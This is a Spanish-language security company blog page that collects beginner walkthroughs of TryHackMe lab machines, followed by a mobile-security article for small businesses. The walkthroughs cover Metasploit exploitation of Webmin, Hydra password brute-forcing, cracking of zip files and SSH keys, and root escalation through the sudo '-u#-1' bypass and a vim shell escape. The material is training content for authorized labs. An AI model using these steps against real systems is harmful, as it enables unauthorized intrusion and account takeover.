Manual de Pentesting para Principiantes Utilizando la Máquina Source TryHackMe. Máquina para empezar en el pentesting y en el uso de herramientas como nmap y metasploit
Parte 1: Preparación
Antes de comenzar con el pentesting en la máquina Source, es importante realizar algunas configuraciones iniciales.
Paso 1: Crear directorio de trabajo y editar el archivo de hosts Source TryHackMe
Descripción: Para organizar el proyecto, crearemos un directorio de trabajo y editaremos el archivo de hosts para asociar la dirección IP de la máquina objetivo con un nombre de dominio.
Comandos:
Crear directorio de trabajo: Abre una terminal y ejecuta el siguiente comando: mkdir directorio_trabajo
Editar archivo hosts: Ejecuta nano /etc/hosts para abrir el archivo hosts en el editor de texto.
Agregar la siguiente línea al archivo hosts: <ip_maquina> nombredominio (reemplaza <ip_maquina> con la dirección IP de la máquina objetivo y «nombredominio» con el nombre que desees asignar).
Parte 2: Escaneo y Reconocimiento de Source TryHackMe
El escaneo y reconocimiento son pasos fundamentales en un pentesting. Nos permiten obtener información sobre la máquina objetivo y los servicios que están en ejecución.
Paso 2: Realizar ping a la máquina y descubrir el TTL
Descripción: Realiza un ping a la dirección IP de la máquina objetivo para verificar que está en línea y obtener información como el TTL (Time To Live).
Comando: Abre una terminal y ejecuta el siguiente comando: ping -c 1 <ip_maquina>
TTL: El TTL obtenido en la respuesta del ping puede ayudarnos a identificar el sistema operativo de la máquina objetivo. Un TTL de 63 generalmente indica un sistema operativo Linux.
Paso 3: Hacer un primer escaneo con nmap en Source TryHackMe
Descripción: Realiza un escaneo de puertos básico utilizando nmap para identificar los servicios asociados a los puertos abiertos.
Comando: En la terminal, ejecuta: nmap -sVC -oN nmap_source <ip_maquina>
Servicios encontrados:
Puerto 22: El servicio asociado al puerto 22 es SSH (Secure Shell), que proporciona un acceso remoto seguro a la máquina.
Puerto 10000: Es posible que este puerto esté asociado a Webmin, un panel de administración web para sistemas Unix.
Parte 3: Escaneo Completo y Detección de Vulnerabilidades en Source TryHackMe
El siguiente paso es realizar un escaneo completo de puertos en la máquina objetivo y utilizar herramientas para detectar vulnerabilidades.
Paso 4: Escaneo completo de la máquina con nmap
Descripción: Realiza un escaneo completo de puertos en la máquina objetivo, identificando los servicios y versiones asociados a cada puerto. También utiliza scripts de detección de vulnerabilidades.
Comando: Ejecuta en la terminal: nmap -p 22,10000 -sCVS --min-rate 5000 -v -n -Pn <ip_maquina> -oN nmap_source_completo
Desglose de los comandos:
-p 22,10000: Escanea únicamente los puertos 22 y 10000.
-sCVS: Realiza un escaneo de versiones y scripts de detección de vulnerabilidades.
--min-rate 5000: Establece una tasa mínima de envío de paquetes para acelerar el escaneo.
-v: Activa el modo verboso para obtener más información detallada.
-n: Desactiva la resolución de nombres DNS.
-Pn: Ignora el descubrimiento de host y trata todas las direcciones como en línea.
-oN nmap_source_completo: Guarda los resultados en un archivo llamado «nmap_source_completo».
Paso 5: Búsqueda de exploits para versiones vulnerables
Descripción: Busca exploits disponibles en Metasploit para las versiones específicas de OpenSSH (7.6p1) y Webmin (1.920).
Comandos en Metasploit:
Ejecuta msfconsole en la terminal para iniciar Metasploit.
Utiliza search webmin 1.920 para buscar exploits relacionados con Webmin 1.920.
Selecciona el exploit específico que deseas utilizar con el comando use X.
Utiliza options para ver y configurar las opciones del exploit seleccionado.
Establece la dirección IP de la máquina objetivo como objetivo del exploit con el comando set RHOSTS <ip_maquina>.
Establece la dirección IP de la interfaz «tun0» o la dirección IP de tu VPN como dirección de origen del exploit con el comando set LHOST tun0.
Habilita el uso de SSL en la comunicación con set SSL yes.
Ejecuta el exploit con el comando run y realiza el intento de explotación.
Parte 4: Mejora de la Shell y Exploración
Después de obtener acceso a la máquina objetivo, podemos mejorar la shell y explorar los directorios y archivos relevantes en busca de banderas o evidencias.
Paso 6: Mejora de la shell con Meterpreter
Descripción: Mejora la shell obtenida mediante el exploit utilizando Meterpreter para obtener capacidades avanzadas.
Comandos en Metasploit:
Presiona Ctrl + Z para poner en pausa Metasploit y acceder al shell.
Utiliza search shell_to_meterpreter para buscar una carga útil compatible con la mejora de shell a Meterpreter.
Selecciona la carga útil específica que deseas utilizar con el comando use 0.
Establece la sesión en la que se encuentra la shell para la mejora a Meterpreter con set SESSION 1.
Ejecuta la carga útil y realiza la mejora de shell con el comando run.
Para acceder a Meterpreter, utiliza el comando sessions 2.
Paso 7: Exploración y búsqueda de banderas
Descripción: Una vez obtenido el acceso a la máquina, explora los directorios y archivos relevantes para encontrar las banderas o evidencias requeridas.
¡Enhorabuena! Has realizado los pasos necesarios para escanear, identificar vulnerabilidades y obtener acceso a la máquina objetivo. Recuerda que este manual es con fines educativos y solo debe ser utilizado en sistemas y redes donde tengas autorización para realizar pruebas de penetración.
Resumen y Tipo de Máquina de Source TryHackMe
En este manual, hemos cubierto los pasos esenciales para realizar un pentesting en la máquina Source. Comenzamos preparando nuestro entorno de trabajo y editando el archivo de hosts para asociar la dirección IP de la máquina objetivo con un nombre de dominio.
Luego, realizamos un escaneo inicial utilizando nmap para identificar los servicios asociados a los puertos abiertos. Continuamos con un escaneo completo de la máquina objetivo, utilizando nmap para obtener información detallada sobre los servicios y versiones.
A continuación, exploramos la búsqueda de exploits para versiones vulnerables en Metasploit y utilizamos diferentes comandos para configurar y ejecutar un exploit específico.
Una vez obtenido el acceso a la máquina, mejoramos nuestra shell utilizando Meterpreter para obtener capacidades avanzadas y exploramos los directorios y archivos relevantes en busca de banderas o evidencias.
En resumen, hemos seguido una metodología de pentesting que abarca desde el escaneo y reconocimiento inicial hasta la explotación y la exploración de la máquina objetivo.
Confía en DCSeguridad
Si estás interesado en fortalecer la seguridad de tu empresa y proteger tu red contra posibles vulnerabilidades, te invitamos a contactar a DCSeguridad. Somos expertos en ciberseguridad y podemos ayudarte a evaluar y mejorar la seguridad de tu infraestructura. También te invitamos a unirte a nuestro canal de Telegram, donde compartimos información relevante sobre seguridad y te mantendremos al tanto de las últimas noticias y tendencias en el campo de la ciberseguridad.
¡No esperes más para proteger tu empresa! Contáctanos y fortalece tu seguridad hoy mismo.
En este manual, te guiaré a través de los pasos básicos del pentesting utilizando la máquina TryHackMe Agent Sudo. A lo largo del proceso, te explicaré el propósito de cada herramienta utilizada y describiré el significado de cada flag o opción utilizada en los comandos. Sigue las instrucciones cuidadosamente para obtener resultados exitosos.
Paso 1: Escaneo de Puertos
Para comenzar, creamos un directorio con el nombre de la máquina y agregamos la dirección IP al archivo de hosts:
En este caso, encontramos que los puertos 21, 22 y 80 están abiertos.
Paso 2: Inspección de la Web
Ahora procederemos a inspeccionar la página web. Utilizaremos Burp Suite para descifrar el nombre de usuario. Sigue estos pasos:
Abre Burp Suite y cambia el User-Agent:XXXXXX a User-Agent:C, dale boton derecho y le damos send to repeater, vamos a la pestaña Repeater y damos a Follow Redirection
Veras la parte derecha el nuevo texto.
Identifica un nombre de usuario y una indicación de que su contraseña es débil.
Paso 3: Obtención de Contraseña de Usuario
Usaremos Hydra para obtener la contraseña del usuario encontrado. Ejecuta el siguiente comando:
hydra -l chris -P /ruta/diccionario.txt ipmaquina ftp
Este comando intentará encontrar la contraseña del usuario «chris» utilizando un diccionario de contraseñas.
Paso 4: Descarga de Archivos del FTP
Ahora, descargaremos todos los archivos del servidor FTP a nuestra máquina local utilizando el comando «get» de FTP. Ejecuta lo siguiente:
ftp ipmaquina
get *
Esto descargará todos los archivos presentes en el servidor FTP.
Paso 5: Inspección de Archivos Descargados
Según la información recibida, hay un archivo zip protegido con contraseña entre los archivos descargados. Realizaremos las siguientes acciones:
Utilizaremos «binwalk» para analizar el archivo «cutie.png» y extraer su contenido:
binwalk cutie.png -e --run-as=root
Usaremos «john» para descifrar la contraseña del archivo .zip utilizando un diccionario de contraseñas:
zip2john 8702.zip > hash.txt
john --wordlist=/ruta/diccionario.txt hash.txt
Extraemos el archivo .zip utilizando el comando «7z»:
7z x 8702.zip
Paso 6: Decodificación de Contenido
Una vez extraído el archivo .zip, encontramos un archivo de texto con parte del contenido codificado en base64. Utilizaremos el siguiente comando para decodificarlo:
cat 'texto' | base64 -d; echo
Esto nos proporcionará otra contraseña.
Paso 7: Descompresión de Otra Imagen
Ahora, utilizaremos la herramienta «steghide» para extraer el contenido de otra imagen. Ejecuta el siguiente comando:
steghide extract -sf cutie-alien.jpg
Luego, lee el archivo resultante y encontrarás una nueva contraseña.
Paso 8: Acceso SSH y Escalamiento de Privilegios
Utilizando las credenciales obtenidas, podemos acceder a la máquina a través de SSH con el nuevo usuario y contraseña. Captura la bandera y luego, en otro terminal, descarga la imagen utilizando «scp»:
Realiza una búsqueda de la imagen en Google utilizando la función de búsqueda de imágenes inversa y busca en la página de Fox News.
Dentro de SSH, ejecuta el siguiente comando para verificar los permisos del usuario:
sudo -l
Encuentra una vulnerabilidad en (ALL, !root) /bin/bash. Investiga en línea para encontrar una posible explotación.
Encuentra un script en https://github.com/n0w4n/CVE-2019-14287 y crea un archivo llamado «sudo.sh» en el servidor con su contenido. Luego, ejecuta el script con el siguiente comando:
bash sudo.sh
Con esto, obtendrás acceso de root y podrás buscar la última bandera. ¡Máquina hackeada!
También tenemos otra forma de escalar privilegios que es mediante la ejecución del comando sudo -u#-1 /bin/bash yo esta forma la realice a posteriori, ya que en vez de poner este comando puse sudo -u#1 /bin/bash y me llevaba al usuario daemon.
Resumen:
En este manual, hemos llevado a cabo una prueba de penetración en la máquina TryHackMe Agent Sudo. A través de la inspección de la web, obtuvimos un nombre de usuario y una contraseña débil. Descargamos archivos del servidor FTP y encontramos un archivo .zip protegido con contraseña. Utilizando diversas herramientas, desciframos la contraseña del .zip, extrajimos su contenido y descubrimos otra contraseña. A través de SSH, accedimos a la máquina con nuevas credenciales y finalmente escalamos privilegios utilizando una vulnerabilidad en sudo. Como resultado, logramos obtener acceso de root y completamos la prueba de penetración.
¡No dudes en ponerte en contacto con DCSeguridad para obtener más información sobre seguridad y unirte a nuestro canal de Telegram!
En el mundo actual, donde los dispositivos móviles juegan un papel fundamental en nuestras vidas y en el entorno empresarial, la seguridad móvil se ha convertido en una preocupación cada vez más importante para las pymes. Proteger los dispositivos móviles y los datos que se almacenan en ellos es crucial para evitar ataques cibernéticos y salvaguardar la información sensible de la empresa. En este artículo, te brindaremos consejos prácticos y medidas de seguridad para securizar los dispositivos móviles de tu empresa.
La importancia de la seguridad móvil en las pymes
En un mundo cada vez más conectado, donde los dispositivos móviles son utilizados para acceder a información confidencial y llevar a cabo transacciones empresariales, la seguridad móvil se ha vuelto vital para proteger los activos de las pymes. Los dispositivos móviles, como smartphones y tablets, son más susceptibles a ataques debido a su naturaleza portátil y a menudo se convierten en el eslabón más débil en la cadena de seguridad de una empresa.
Riesgos y amenazas móviles
Existen diversas amenazas y riesgos que pueden afectar la seguridad de los dispositivos móviles en una pyme. Algunas de las amenazas comunes incluyen malware, phishing, robo de datos, aplicaciones maliciosas y redes Wi-Fi inseguras. Estas amenazas pueden tener consecuencias devastadoras, como la pérdida de datos, el acceso no autorizado a información confidencial y la interrupción de las operaciones comerciales.
Protección de datos en dispositivos móviles
La protección de los datos en los dispositivos móviles es fundamental para mantener la seguridad de una empresa. Aquí te presentamos algunas medidas clave que puedes tomar:
Implementa contraseñas y autenticación de dos factores: Configura contraseñas fuertes y cambialas regularmente. Además, habilita la autenticación de dos factores para agregar una capa adicional de seguridad.
Actualiza y parchea los sistemas operativos y las aplicaciones: Mantén tus dispositivos móviles actualizados con los últimos parches de seguridad y actualizaciones del sistema operativo y las aplicaciones. Estas actualizaciones a menudo contienen correcciones de seguridad importantes.
Utiliza soluciones de seguridad móvil: Instala soluciones antivirus y antimalware en tus dispositivos móviles para detectar y eliminar amenazas. También puedes considerar soluciones de gestión de dispositivos móviles (MDM) para controlar y proteger los dispositivos de manera centralizada.
Cifra los datos: Habilita la opción de cifrado en tus dispositivos móviles para proteger la información confidencial almacenada en ellos. Esto garantizará que, en caso de pérdida o robo, los datos no sean accesibles sin la clave de cifrado.
Realiza copias de seguridad regulares: Realiza copias de seguridad de los datos de tus dispositivos móviles en un lugar seguro. En caso de pérdida o daño del dispositivo, podrás restaurar los datos sin problemas.
Aplicaciones seguras y políticas de uso
Además de proteger los datos, es importante tener en cuenta las aplicaciones que se instalan en los dispositivos móviles de la empresa. Aquí hay algunas pautas a seguir:
Descarga aplicaciones solo de fuentes confiables: Utiliza tiendas de aplicaciones oficiales, como Google Play Store o Apple App Store, para descargar aplicaciones. Evita instalar aplicaciones de fuentes desconocidas o no verificadas.
Lee las reseñas y los permisos de la aplicación: Antes de instalar una aplicación, revisa las reseñas de otros usuarios y los permisos que solicita. Si algo parece sospechoso o excesivo, evita instalarla.
Establece políticas de uso: Define políticas claras sobre el uso de dispositivos móviles en la empresa. Esto puede incluir restricciones sobre la instalación de aplicaciones no autorizadas o el acceso a redes Wi-Fi inseguras.
Conclusión
La seguridad móvil y la protección de datos en las pymes son aspectos fundamentales para garantizar la integridad y la confidencialidad de la información empresarial. Mediante la implementación de las medidas de seguridad mencionadas anteriormente, puedes fortalecer la seguridad de los dispositivos móviles de tu empresa y minimizar los riesgos asociados. Recuerda que la seguridad móvil es un proceso continuo y que debes estar siempre actualizado con las últimas amenazas y soluciones de seguridad.
DCSeguridad: Tu socio en ciberseguridad
En DCSeguridad, somos expertos en ciberseguridad para pymes y ofrecemos soluciones integrales para proteger tus dispositivos móviles y datos empresariales. Nuestro equipo altamente capacitado puede ayudarte a evaluar los riesgos, implementar políticas de seguridad y proporcionar las soluciones adecuadas para tu negocio. ¡Ponte en contacto con nosotros hoy mismo y únete a nuestro canal de Telegram para estar al tanto de las últimas noticias y consejos de seguridad móvil! Tu tranquilidad y la protección de tu empresa son nuestra prioridad.
Recuerda que la ciberseguridad es un aspecto crítico para cualquier empresa, y contar con expertos en el campo puede marcar la diferencia entre la protección y la vulnerabilidad. No dudes en consultar a profesionales calificados para obtener el mejor asesoramiento y las soluciones más efectivas para tu empresa.
En este manual de pentesting, aprenderás los pasos necesarios para resolver la máquina Basic Pentesting Try Hack Me. A través de este proceso, exploraremos cómo escanear puertos abiertos, enumerar directorios y usuarios, realizar ataques de fuerza bruta y obtener acceso a la máquina objetivo con privilegios adicionales mediante la búsqueda y descifrado de claves y contraseñas.
Parte 1: Preparación y escaneo de puertos
Crea una carpeta en el escritorio con el nombre de la máquina para organizar los archivos necesarios. Esta recomendación es para mantener ordenado y tener fácil acceso a los archivos utilizados durante el pentesting.
Realiza un escaneo de puertos utilizando nmap con el siguiente comando:
-sC ejecuta scripts de enumeración y detección de servicios.
-sV detecta las versiones de los servicios.
-sS realiza un escaneo TCP SYN.
--min-rate 5000 establece la tasa mínima de paquetes enviados.
-vvv muestra una salida detallada.
-n no realiza resolución DNS.
-Pn ignora el descubrimiento de hosts y trata todas las direcciones IP como en línea.
ipmaquina es la dirección IP de la máquina a escanear.
-oN nmap_basic_pentesting guarda la salida en un archivo llamado «nmap_basic_pentesting».
El resultado del escaneo muestra los puertos abiertos y los servicios detectados.
Parte 2: Enumeración de directorios y usuarios
Utiliza la herramienta Dirb para enumerar los directorios visibles en el servidor web:
dirb http://ipmaquina:80
Este comando realiza un escaneo de directorios y muestra los directorios encontrados.
Para encontrar usuarios, aprovechando que SMB está disponible, ejecuta el siguiente comando:
enum4linux -a ipmaquina
enum4linux - smb es una herramienta que enumera información de SMB en una máquina.
-a muestra información adicional.
ipmaquina es la dirección IP de la máquina a enumerar.
Realiza un ataque de fuerza bruta a través de SSH para descubrir la contraseña del usuario «jan»:
hydra -l jan -P /ruta/diccionario.txt ipmaquina ssh
hydra es una herramienta de fuerza bruta que intenta adivinar contraseñas.
-l jan especifica el usuario objetivo.
-P /ruta/diccionario.txt indica la ruta del diccionario de contraseñas a utilizar.
ipmaquina es la dirección IP de la máquina objetivo.
Parte 3: Acceso a la máquina y escalada de privilegios
Accede a la máquina mediante SSH utilizando el usuario «jan» y la contraseña descubierta:
ssh jan@ipmaquina
Enumera los directorios en la máquina para buscar información adicional:
ls -l
Encuentra el archivo «pass.bak» en el directorio de «kay», pero no tienes acceso a él en este momento.
Para obtener acceso a la máquina como el usuario «kay», realiza los siguientes pasos: a. Navega al directorio «.ssh»: cd .ssh b. Muestra el contenido del archivo «id_rsa»: cat id_rsa
Este archivo contiene la clave privada de «kay» que utilizaremos más adelante.
c. Copia la clave privada y pégala en un archivo en tu directorio de trabajo local llamado «rsa_kay.txt».
Utiliza la herramienta John the Ripper para desencriptar la clave privada de «kay»: a. Convierte el formato del archivo «rsa_kay.txt» utilizando el script «ssh2john.py»: python3 /usr/share/john/ssh2john.py rsa_kay.txt > rsa_kay_desencriptado.txt b. Ejecuta John the Ripper con el siguiente comando: john --wordlist=rockyou.txt rsa_kay_desencriptado.txt
Accede nuevamente por SSH al usuario «kay» utilizando la clave privada desencriptada: ssh -i /home/kay/.ssh/id_rsa [email protected]
Ahora tienes acceso al usuario «kay». Encuentra la última bandera disponible en el archivo «pass.bak».
En resumen, este manual de pentesting cubre los pasos necesarios para escanear los puertos abiertos, enumerar directorios y usuarios, realizar ataques de fuerza bruta, acceder a la máquina con los usuarios descubiertos y obtener privilegios adicionales mediante el descubrimiento de claves y contraseñas. Cada comando utilizado desempeña un papel específico en el proceso de pentesting, desde la recopilación de información hasta la escalada de privilegios.
¡Únete a DCSeguridad y protege el mundo digital!
DCSeguridad es una empresa líder en el campo de la ciberseguridad, dedicada a proteger los sistemas y datos de sus clientes contra las amenazas cada vez más sofisticadas en el mundo digital. Si estás interesado en formar parte de este apasionante mundo de la ciberseguridad y contribuir a la protección de la información confidencial, ¡te invitamos a unirte a nosotros!
Nuestro equipo de expertos en seguridad informática está comprometido en brindar soluciones efectivas y personalizadas a nuestros clientes, garantizando la confidencialidad, integridad y disponibilidad de sus datos. Trabajamos estrechamente con organizaciones de diferentes sectores, desde pequeñas empresas hasta grandes corporaciones, ofreciendo servicios de auditoría, consultoría y respuesta a incidentes, entre otros.
¿Quieres estar al tanto de las últimas noticias y tendencias en ciberseguridad? ¡No busques más! Te invitamos a unirte a nuestro canal de Telegram, donde compartimos contenido exclusivo, consejos de seguridad, noticias relevantes y oportunidades de empleo en el campo de la ciberseguridad. Nuestro canal es una comunidad activa donde podrás interactuar con otros profesionales y entusiastas de la ciberseguridad, aprender de sus experiencias y compartir tus conocimientos.
¡No te pierdas la oportunidad de formar parte de nuestra comunidad en Telegram! Juntos, podemos hacer del mundo digital un lugar más seguro. ¡Te esperamos en DCSeguridad!
En este manual, te guiaré a través de los pasos básicos para realizar un pentesting utilizando la máquina SimpleCTF Try Hack Me. Aprenderás las herramientas y técnicas necesarias para identificar vulnerabilidades y explotarlas.
Paso 1: Crear directorio de trabajo y añadir host
Para empezar, crea un directorio para trabajar y añade la dirección IP del objetivo para facilitar algunas tareas posteriores.
Paso 2: Escaneo de puertos y detección de servicios
Utilizaremos la herramienta nmap para escanear los puertos y descubrir los servicios en la máquina objetivo. Ejecuta el siguiente comando:
-sC: Ejecuta scripts de detección de servicios predeterminados.
-sV: Detecta la versión de los servicios en los puertos abiertos.
-Pn: Ignora el descubrimiento de hosts y realiza el escaneo directamente.
-oN: Guarda la salida en un archivo en formato normal.
--script vuln: Esta opción activa la ejecución de scripts de detección de vulnerabilidades incluidos en la base de datos de scripts de nmap. Estos scripts están diseñados para identificar posibles vulnerabilidades en los servicios y aplicaciones que se encuentran en los puertos abiertos. Al utilizar la opción --script vuln, nmap ejecutará una serie de scripts específicos para buscar posibles vulnerabilidades conocidas en los servicios detectados. Estos scripts analizan los banners y respuestas de los servicios para identificar comportamientos o patrones que puedan indicar la existencia de una vulnerabilidad. Es importante tener en cuenta que los scripts de detección de vulnerabilidades de nmap son una herramienta útil para identificar posibles problemas de seguridad en una máquina objetivo. Sin embargo, la detección de vulnerabilidades no garantiza la explotación exitosa de las mismas. Es necesario realizar una evaluación adicional y utilizar herramientas especializadas para confirmar y explotar las vulnerabilidades encontradas. Al utilizar la opción --script vuln, estarás ampliando la cobertura de tu escaneo de seguridad para buscar activamente posibles vulnerabilidades en los servicios de la máquina objetivo. Esto te proporcionará información valiosa para tomar medidas y fortalecer la seguridad de la infraestructura.
Paso 3: Descubrimiento de directorios
Para encontrar posibles directorios ocultos en el sitio web, usaremos la herramienta dirb. Ejecuta el siguiente comando:
dirb http://ipmaquina:80
Paso 4: Descubrimiento del directorio /simple
Al utilizar dirb en el paso anterior, hemos descubierto un directorio llamado «/simple» en el sitio web. Accede a él mediante el siguiente enlace: http://ipmaquina/simple.
Paso 5: Identificación del CMS y búsqueda de vulnerabilidades
Al acceder al directorio «/simple», observamos que se utiliza el CMS Made Simple versión 2.2.8. Ahora, buscamos posibles vulnerabilidades en este CMS.
Hay dos opciones para encontrar exploits:
Ejecutar el comando searchsploit cms made simple 2.2.8 para buscar en la lista de exploits disponibles.
Buscar la vulnerabilidad CVE-2019-9053 en motores de búsqueda como Google, GitHub o Exploit-DB. En este caso, encontramos un exploit en GitHub.
Paso 6: Clonar el exploit de GitHub
Para evitar problemas de compatibilidad con la versión de Python 3, clonaremos el exploit de GitHub en nuestro directorio de trabajo. Ejecuta el siguiente comando:
--crack: Realiza una prueba de fuerza bruta utilizando un diccionario de contraseñas.
-w: Especifica la ruta al archivo de diccionario de contraseñas.
Paso 11: Acceso mediante SSH
Después de ejecutar el exploit, obtendrás el usuario y la contraseña. Ahora, puedes acceder a la máquina objetivo mediante SSH utilizando el siguiente comando:
ssh usuario@ipmaquina -p 2222
Paso 12: Escalada de privilegios
Una vez dentro de la máquina, verifica los privilegios disponibles ejecutando sudo -l. Si encuentras la opción de escalar privilegios utilizando /usr/bin/vim, puedes buscar el método exacto en el sitio web https://gtfobins.github.io/.
Por ejemplo, si puedes ejecutar sudo vim -c ':!/bin/sh', podrás escalar a la cuenta de root.
Resumen de los pasos seguidos
En este pentesting, realizamos los siguientes pasos:
Escaneo de puertos y detección de servicios utilizando nmap.
Descubrimiento de directorios ocultos utilizando dirb.
Identificación del CMS y búsqueda de vulnerabilidades.
Clonación del exploit de GitHub.
Ejecución del exploit para obtener acceso al sitio web.
Acceso a la máquina mediante SSH utilizando las credenciales obtenidas.
Escalada de privilegios utilizando el exploit específico para la máquina objetivo.
Hemos trabajado en una máquina Linux, que presentaba vulnerabilidades en el CMS Made Simple versión 2.2.8. A través de pasos cuidadosos de escaneo, descubrimiento y explotación, logramos obtener acceso a la máquina y escalar nuestros privilegios.
Confía en DCSeguridad
Si estás interesado en aprender más sobre seguridad informática y pentesting, te animo a ponerte en contacto con nuestra empresa DCSeguridad. Estamos dedicados a brindar servicios de seguridad de alta calidad y también ofrecemos un canal de Telegram donde compartimos información valiosa y consejos sobre seguridad.
¡Únete a nosotros y fortalece tus habilidades en el emocionante mundo del pentesting!
Espero que este manual te sea útil en tu aprendizaje de pentesting. Recuerda siempre realizar pruebas de penetración de manera ética y respetar la privacidad de los sistemas y redes que analices. ¡Buena suerte en tu camino hacia convertirte en un experto en seguridad!
Para ofrecer las mejores experiencias, utilizamos tecnologías como las cookies para almacenar y/o acceder a la información del dispositivo. El consentimiento de estas tecnologías nos permitirá procesar datos como el comportamiento de navegación o las identificaciones únicas en este sitio. No consentir o retirar el consentimiento, puede afectar negativamente a ciertas características y funciones.
Funcional
Siempre activo
El almacenamiento o acceso técnico es estrictamente necesario para el propósito legítimo de permitir el uso de un servicio específico explícitamente solicitado por el abonado o usuario, o con el único propósito de llevar a cabo la transmisión de una comunicación a través de una red de comunicaciones electrónicas.
Preferencias
El almacenamiento o acceso técnico es necesario para la finalidad legítima de almacenar preferencias no solicitadas por el abonado o usuario.
Estadísticas
El almacenamiento o acceso técnico que es utilizado exclusivamente con fines estadísticos.El almacenamiento o acceso técnico que se utiliza exclusivamente con fines estadísticos anónimos. Sin un requerimiento, el cumplimiento voluntario por parte de tu proveedor de servicios de Internet, o los registros adicionales de un tercero, la información almacenada o recuperada sólo para este propósito no se puede utilizar para identificarte.
Marketing
El almacenamiento o acceso técnico es necesario para crear perfiles de usuario para enviar publicidad, o para rastrear al usuario en una web o en varias web con fines de marketing similares.